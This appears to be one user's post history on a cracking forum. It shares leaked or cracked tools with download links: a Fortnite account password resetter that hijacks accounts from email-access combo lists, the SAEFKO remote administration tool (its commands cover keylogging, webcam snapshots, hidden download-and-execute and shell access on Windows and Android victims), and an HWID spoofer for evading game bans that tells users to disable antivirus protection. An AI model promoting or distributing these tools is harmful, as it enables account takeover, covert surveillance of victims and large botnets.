ForlaxPy

Members
  • Content Count

    732
  • Last visited

Posts posted by ForlaxPy


  1. [align=center]Basically what this program does is

    Resets the password of the fortnite account from email access accounts (combo)

    Load an email access combo

    And proxy / proxyless both supported

     

    Then just start it, and it will reset passwords from the email access accounts automatically

    It's fast enough, and using proxy will slightly increase the speed!

    Currently No capture has been added (Lazy to do) :/

     

    You can create your own pass while reseting

    GIF

     

    Y69NA6B.gif

    Not so HQ GUI but it does the work

     

    [/align]

    pqOdPoN.png

     

     

    [align=center]Download Program open it

    it will give you hwid provide me the hwid in the comment

    Enter Cracked.To Auth https://cracked.to/auth.php[/align]

     

    Thanks to @Devil for leaking it  :ezy:

     

     

    [hide]

    Download: https://anonfile.com/qdN2g6veb7/FortniteReseterByLEFTCRACKER_zip

    [/hide]


  2. Actually the Disinfector role is harder that what y do think. You're dealing here with hardcodded smart malwares fully hidden by crypters, you will have to study the exe and run multiples test on it to see if it's actually stealing or logging something, it's not always the case that it drops something. It could be injecting it self when it runs and bunch of others options. It's not that easy to detect these so if you guys are willing to drop them online and scan then just forget about the role. I agree that the Disinfectors are kinda lazy and they do the necessaries tests and that something I pmed floraiN about few weeks ago. So in short we need real malwares analysers, real one that could actual reverse the way hows a program works and to study it or at least set up a dedicated Virtual Environment and check how these programs behaves on the OS to make sure that it's clean.


  3. If you want to download the crackered version which will never work will, pls just don't come crying to SAS team that the software is backdoored or you pc is infected ,we do not hold any rebionsblty for this. pulse these do not have encrypting updates "FUD'S" or any type of updates.

     

    SAEFKO TEAM.

     

    Look who's talking. You was actually stealing the bots from your users by sending them to your cpanel I had to clear your shitty tool from that you better thank me.


  4. This requires your

    Auth Key and you need to be a Premium Member, Infinity or Supreme

     

    SKLK4JR.png

     

     

     

     

    [align=left]This is "a multi protocol multi operating system" remote adminstration tool , This is the first system to use three protocols establishing all time communication , there is four main thing this design provides that no other system provide first

    • Unlimited number of machines to control.

    • Extreme reliability.

    • Android and Windows control at the same time.

    • No port forwarding "IRC,HTTP".

     

    OmREXUO.png

    yyS4E52.png

    [/align]

     

     

    [align=left]How it works ?

    First the agent connect to HTTP server the login into some random IRC servers ,then store the usernames and server in the database throgh HTTP.affter that the attcker can load these server and connect to the agent throgh IRC , then to enable TCP the attacker send TCP command throgh IRC to start on demand TCP connection.[/align]

     

     

    [align=left]Does it require anything?

    Yes. .NET framework 4.5 or higher. Java 1.8 or above. And for TCP connection you need to port forward port "1616"[/align]

     

     

     

    Quick Setup:

    [video=youtube]

     

     

    More Details and FAQ:

     

     

    [align=left]

    Android Build[/align]

    [align=left]

    [video=youtube]

     

    Windows Build[/align]

    [align=left]

    [video=youtube]

     

    HTTP Features

     

    • Public http features

    Here you can set tasks to all Agents to run tasks inclunding windows agents andandroid agents.

     

    600x340http://www.saefkosystems.pro/PublicPage/SliderImages/Main_10.png[/img]

     

    • Private http features

    Here you can set tasks to only the selected Agents to run tasks.

     

    600x340http://www.saefkosystems.pro/PublicPage/SliderImages/Main_11.png[/img]HTTP Tasks Types

     

    • Download And excute
       
    • Show Message Box
       
    • Visit Website
       
    • Shell Commands

    IRC Features

     

    600x340http://www.saefkosystems.pro/PublicPage/SliderImages/Main_12.png[/img]

     

    • WINDOWS COMMANDS
       
      • [pwd] Show current directory.
      • [screenshot] Take a screenshot to from the target machine.
      • [opencd] Open cd rom.
      • [closecd] Close cd rom.
      • [ping] Ping the agent machine to check if still active.
      • [camlist] Get a list of available camera devices.
      • [snapshot] Get snapshot from camera eg : 'snapshot CAMERA_INDEX'.
      • [location] Get geo location information based on 'ipinfo.com'.
      • [opencd] Open cd rom.
      • [keylogs] Get agent saved keylogs through HTTP drop point.
      • [shell] Run shell commands.
      • [dexe] Download and execute a file in visible mode eg : 'dexe http://www.site.com/applicaetion.exe'.
      • [hdexe] Download and execute a file in hidden mode eg : 'dexe http://www.site.com/applicaetion.exe'.
      • [vistpage] Vist a webpage in visible mode eg : 'vistpage http://www.site.com'.
      • [hvistpage] Vist a webpage in hidden mode eg : 'hvistpage http://www.site.com'.
      • [uninstall] Uninstall the agent completely from the target machine.

    • ANDROID COMMANDS
       
      • [msg] Show toast message.
      • [dexe] Download and execute a file in visible mode eg : 'dexe http://www.site.com/applicaetion.exe'.
      • [hdexe] Download and execute a file in hidden mode eg : 'dexe http://www.site.com/applicaetion.exe'.
      • [vistpage] Vist a webpage in visible mode eg : 'vistpage http://www.site.com'.
      • [hvistpage] Vist a webpage in hidden mode eg : 'hvistpage http://www.site.com'.
      • [snapshot] Get snapshot from camera eg : 'snapshot CAMERA_INDEX'.
      • [ping] Ping the agent machine to check if still active.
      • [location] Get geo location information based on 'ipinfo.com'.
      • [flashon] Turn the dvice flash on.
      • [flashoff] Turn the dvice flash on.
      • [wakeup] Turn dvice screen on.
      • [screenshot] Take a screenshot to from the target machine.

    • GENERAL COMMANDS
       
      • [help] Show list of all available commands and their informations.
      • [clear] Clear the terminal.
      • [opacity] Change the transparency of the terminal eg : 'opacity 0.4'.
      • [myip] Show your public ip address that currently in use.
      • [showtcpport] Show the public port used for TCP communications.
      • [fontcolor] Change the font color eg : 'fontcolor #FFFFFF'.
      • [ping] Ping the agent machine to check if still active.
      • [info] Tells the agent to identify its machine and return short informations about it.
      • [CTRL + C] CTRL + C to cancel any previous commands.
      • [flashoff] Turn the dvice flash on.
      • [cleanup] Close all windows that created by this control uint.
      • [retcp] Order the TCP agent to reconnect , this command used in case of TCP connection is disconnected.
      • [exit] Close the current agent window.

    TCP Features "ANDROID"

     

    600x340http://www.saefkosystems.pro/PublicPage/SliderImages/Main_13.png[/img][/align]

     

    [align=left]TCP Features "WINDOWS"

    600x340http://www.saefkosystems.pro/PublicPage/SliderImages/Main_14.png[/img][/align]

     

    FAQ

     

    [align=left]-Im getting 404 file not found

    Change your PHP version from 5.1 to 7.1

     

    -My TCP tab is disabled ?

    In order to use TCP you must first connect throgh IRC.

     

    -The system just dispers on start up activation ?

    You must have .NET 4.5 on your pc.

     

    -Android Build error APK file not found ?

    You must update your java version above 1.8.

     

    -What is the best hosting for the SAS.

    if you want to handle from 10,000 to 50,000 with high speed for best price this very good hosting : https://www.a2hosting.com/ If you want to go supper extreme above 1000,000 you should go to Amazon AWS EC2 hosting ,the price is very low you only pay for what you use eg: for 1000,000 machine in one month you will bay from 30$ to 35$ with low refresh rate on the agent be careful with the agent refresh rate Here A video how to setup AWS hosting : 

     

    -What will happen to my key ,when i uninstall my SAS ?

    Your key will stay active for that computer ,you can use it any time you want.[/align]

     

     

     

     

     

    [hide]

    Get the auth code from here https://cracked.to/auth.php

    [/hide]

    shoutout to @ItsJahBoyPlank for leaking the files!


  5. Most of checkers posted in here and around cracking forums are net or native based (dedicated for windows platforms). But you could find some Py checkers. Actually working on these.


  6. DeluxeUnban

    y5KNsE2.png

    [align=center] 

    Temporarily unban your PC from Fortnite and other games (not all though, check #status). Also works as a normal HWID spoofer. Works for both EAC & BE.

    Temporarily meaning you will need to respoof if you restart your PC.  :ezy:

     

     

    sMEzLRZ.png

     

    No more bus kicks or ingame kicks.

    EVENTUALLY YOU MAY BE BANNED, JUST RESPOOF AND MAKE ANOTHER ACCOUNT, KEEP PLAYING  :kek:

     

    How it works?

     

    -Tool Owner-

    BEFORE RUNNING PLEASE TURN REAL-TIME PROTECTION OFF OR SPOOFER WON'T WORK!

    unknown.png?width=191&height=300unknown.png?width=400&height=147unknown.png?width=400&height=134

    [/align]

    Run the tool (DeluxeUnban Cracked.exe)

    [align=center]

    8G0SVL6.png

    Auth

    nYa6BAo.png[/align]

    [align=center]

     

    Customize it as you like[/align]

    [align=center]

    G64BTmX.png

     

     

    Then click Spoof And wait for it to get the job done for you

     

    -Tool Owner-

     

    I don't take responsiblity of anything wrong that may happen to you as this is a spoofer it changes some of your pc data temporarly.

     

    [hide]

    DL: https://anonfile.com/C3z410tdb6/DeluxeUnban_zip

    VirusTotal: https://www.virustotal.com/#/file/0a16f68df289af5de147ae9282d219c79cad3ff27c2e685f1a4a0808d2fc98d7/detection

    [/hide]

     

    [/align]